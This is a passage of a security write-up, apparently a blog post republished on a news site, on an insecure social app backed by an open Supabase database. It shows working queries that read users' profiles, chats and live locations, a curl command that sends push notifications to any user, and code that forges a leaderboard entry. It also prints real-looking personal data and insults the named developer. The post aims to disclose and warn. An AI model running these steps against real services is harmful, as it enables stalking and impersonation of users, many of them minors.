1286\nnon-broken profiles: 9427\nsuckers: 146\n\nWeird. 
I'm not quite sure what this indicates, but those numbers are certainly interesting.\n\n(Can you believe that nearly 10k people were dumb enough to sign up for this app?)\n\nExpo\nI've gone ahead and had my girlfriend create an account on her iPhone; this way I can explore a little more without having to worry about stepping on anyone's toes.\nlet result = await supabase\n    .from("profiles")\n    .select()\n    .eq("username", "zoe604385")\n\n{\n    "id": "67cf4fd4-90b0-4f90-9103-1e53dca44787",\n    "updated_at": "2025-07-07T02:05:50.224+00:00",\n    "nickname": "zoe",\n    "age": 25,\n    "birth_date": "2000-01-01",\n    "gender": "other",\n    "user_id": null,\n    "bio": "i am passionate about gooning",\n    "avatar_url": [ "1751232382134_0.jpg" ],\n    "expo_push_token": "ExponentPushToken[**********]",\n    "created_at": "2025-06-29T21:24:34.481+00:00",\n    "username": "zoe604385",\n    "full_name": null,\n    "completed_onboarding": true,\n    "hasActiveSubscription": false,\n    "engagement_score": 2.8,\n    "online": false,\n    "verified": false\n}\n\nThere are a few things here that are noteworthy, but let's investigate the expo_push_token field. It appears that any time a notification is to be sent out, it is issued by the client, with the following steps being taken:\n\n1. Client queries the profiles relation for the recipient's Expo push token\n2. Client issues POST request to Expo containing the notification content and the recipient's token\n3. Recipient queries Expo for pending notifications\n4. Recipient displays notification\n\n\n\nDecompiled Pseudocode for Sending Notifications\n\nr10 = r6;\nr8 = global;\nr6 = r8.HermesInternal;\nr9 = r6.concat;\nr7 = '';\nr6 = ' won the Flag Game! 
🏆🏳️';\nr12 = r9.bind(r7)(r10, r6);\nr9 = r8.fetch;\nr7 = {};\nr6 = 'POST';\nr7['method'] = r6;\nr6 = {};\nr10 = 'application/json';\nr6['Content-Type'] = r10;\nr7['headers'] = r6;\nr11 = r8.JSON;\nr10 = r11.stringify;\nr6 = {'to': null, 'title': 'Game Over 💔', 'body': null, 'data': null, 'sound': 'default', 'priority': 'high', 'channelId': 'default'};\nr15 = r15.expo_push_token;\nr6['to'] = r15;\nr6['body'] = r12;\nr12 = {'type': 'game_win', 'gameId': null, 'screen': 'FlagGame'};\nr14 = _closure2_slot3;\nr12['gameId'] = r14;\nr12['winner'] = r13;\nr6['data'] = r12;\nr6 = r10.bind(r11)(r6);\nr7['body'] = r6;\nr6 = 'https://exp.host/--/api/v2/push/send';\nr6 = r9.bind(r1)(r6, r7);\n\n\nUnder no circumstances should these Expo tokens be exposed to clients, however, the very architecture of this application relies on that being the case. With that in mind, I'm quite sure that it's possible to issue arbitrary push notifications to any user. According to the official Expo Docs all we need to do is issue the following POST request:\ncurl -H "Content-Type: application/json" -X POST "https://exp.host/--/api/v2/push/send" -d '{\n  "to": "ExponentPushToken[**********]",\n  "title":"",\n  "body": ""\n}'\n\nI wonder if it worked...\n\nHall of Fame\nThe main feature that sets Pandu apart from other social media platforms is its integration of games. Despite being poorly executed and far from original, there seems to be a group of people competing for spot #1 on the in-game leaderboard. 
I don't quite like Pandu, but I definitely am competitive by nature- let's see what we can do.\nThe rankings seem to be calculated client-side by simply querying the user_progression relation for the top 20 users sorted by total win count.\nr1 = new Array(2);\nr1[0] = r13;\nr19 = _closure1_slot5;\nr20 = r19.supabase;\nr19 = r20.from;\nr21 = 'user_progression';\nr22 = r19.bind(r20)(r21);\nr20 = r22.select;\nr19 = 'id, username, nickname, wins, level, profiles!inner (avatar_url,age)';\nr24 = r20.bind(r22)(r19);\nr22 = r24.order;\nr19 = {};\nr19['ascending'] = r3;\nr20 = 'wins';\nr24 = r22.bind(r24)(r20, r19);\nr22 = r24.limit;\nr19 = 20;\nr19 = r22.bind(r24)(r19);\nr1[1] = r19;\nr1 = r7.bind(r18)(r1);\nSaveGenerator(address=309);\n\n\n\nCleaned-up Rankings Query\n\nlet leaderboard = await supabase\n    .from("user_progression")\n    .select("id, username, nickname, wins, level, profiles!inner (avatar_url,age)")\n    .order("wins", { ascending: false })\n    .limit(20);\n\n\nPresumably, all we should have to do is create a profile and populate those aforementioned fields such that we satisfy the query. 
Additionally, we need to set the user_id field to satisfy the foreign key relationship between user_progression and profiles.\nFirst, let's create the account:\nconst auth = await supabase.auth.signUp(\n    {\n        email: "john@fortnite.com",\n        password: "fuckyounerd",\n    }\n);\n\nconst userId = auth.data.user.id;\n\nAnd now we can populate the fields of the relations:\nawait supabase\n    .from("user_progression")\n    .upsert(\n        {\n            id: userId,\n            user_id: userId,\n            username: "john_fortnite_xx",\n            nickname: "john xx fortnite",\n            wins: 6969,\n            level: 1000000,\n        }\n    );\n\nawait supabase\n    .from("profiles")\n    .upsert(\n        {\n            id: userId,\n            user_id: userId,\n            age: 100,\n            avatar_url: ["totallyrealimage.png"]\n        }\n    );\n\nAnd voilà! :)\n\nChats\nMoving on to something a bit more serious, the privacy implications of using software built by someone whose productive output is directly tied to the uptime of Cursor are absolutely horrendous. Despite his apparent lack of competence, it appears that he has (miraculously) managed to implement user chat sessions in a pretty solid way. By piggybacking off of Supabase's authentication and StreamChat's real-time communication API, he has completely avoided doing any heavy lifting himself. Smart.\nWith this in mind, we should look for the tiny portion of this stack that he is responsible for creating. Before a chat session is initialized, a "chat request" is first sent out to a user, after which they can choose to either accept or reject the invitation. Checking the table of relations we mined earlier, the chat_requests relation seems like it might be relevant. 
Let's investigate.\nawait supabase\n    .from("chat_requests")\n    .select()\n    .limit(1);\n\n[\n  {\n    "id": "4a9793fd-2a12-4142-baa1-9552cf5df39c",\n    "created_at": "2025-04-17T01:02:26.087669+00:00",\n    "sender_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",\n    "sender_name": "Christian",\n    "sender_avatar": "1744702431504.jpg",\n    "receiver_id": "42a26d91-8ea3-492c-9038-ac1b79633e53",\n    "receiver_name": "Christopher",\n    "receiver_avatar": "1",\n    "message": "Yo wassup",\n    "status": "accepted"\n  }\n]\n\nYup! Our suspicion is confirmed. Every single chat request is public! This is truly a nightmare. Even worse, I seemingly have read/write access to this table, meaning it's feasible to send chat requests with arbitrary messages on behalf of other users.\nUser Location\nOkay, I think it's time we stop beating around the bush. I'm sure if you've been an attentive reader you will have noticed the user_locations relation from earlier. The in-app use case of this appears to be matching users up with others who are geographically close to them. While I understand the justification for a feature like this, the execution here is dangerously flawed. With a single select I am able to pull the live geographic location of any user on the app. You heard me right. 
This is not the future of social media, it's a sexual predator's wet dream.\nawait supabase\n    .from("user_locations")\n    .select()\n    .eq("id", "0f982e76-6479-4f7d-a995-b26a6d5ee5b6")\n\n[\n  {\n    "created_at": "2025-03-17T16:15:45.062944+00:00",\n    "latitude": 42.6897712735434,\n    "longitude": -73.8244290461434,\n    "country": "United States",\n    "state": "NY",\n    "last_updated": "2025-04-15T07:30:23.973+00:00",\n    "city": "Albany",\n    "id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",\n    "user_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6"\n  }\n]  \n\nIf you need even more compelling evidence that this app is downright dangerous, take a quick look at this histogram of profile count by age:\n\nNearly a thousand children under the age of 18 with their live location, photo, and age being beamed up to a database that's left wide open. Criminal.\nEnter Christian\n\nChristian is the "mastermind" behind this technological shitshow and its parent company, Lunexis. As you've already seen, this man needs no introduction.\n\nAt first, I was wondering how he managed to even publish something like this, but I'm starting to think that Apple just got tired of rejecting it over and over.\nTakeaway\n"Vibe coding" isn't just a cheap shortcut, it's reckless and dangerous. Christian's incompetence is jeopardizing the privacy of hundreds of people, all while he lines his pockets. What he is doing is illegal, perverse, and downright disgusting.\nThink I'm exaggerating? I was planning on doing some math to estimate his MRR, but it looks like he's already gone ahead and bragged about it on Twitter.\n\nEarlier in this write-up I managed to identify 146 active subscribers, assuming this figure is accurate and his revenue-per-subscription has stayed constant, that leaves us with an estimated MRR just north of $2,500. He is making serious money and has absolutely no clue what he's doing!\nCall to Action\nCalling this platform harmful is not an understatement. 
I am urging you to stop supporting this creator, report the app immediately, and get friends and loved ones off of this app as swiftly as possible.\n","articleSection":"world","datePublished":"2025-07-09T18:15:11+0000","dateModified":"2025-07-09T18:15:11+0000","inLanguage":"en-US","author":{"@type":"Person","name":"admin","url":"https://blacknews.news/profile/admin"},"publisher":{"@type":"Organization","name":"blacknews.news","logo":{"@type":"ImageObject","width":600,"height":60,"url":"https://blacknews.news/assets/img/logo.svg"}},"image":{"@type":"ImageObject","url":"https://coal.sh/assets/pandu_ipa_dump.png","contentUrl":"https://coal.sh/assets/pandu_ipa_dump.png","width":870,"height":580},"isAccessibleForFree":true,"hasPart":{"@type":"WebPageElement","isAccessibleForFree":true,"cssSelector":[".post-content"]},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".post-content"]},"keywords":["Just"," Fucking"," Ship"," IT"," Or:"," Vibecoding"]}</script>
</body>
</html>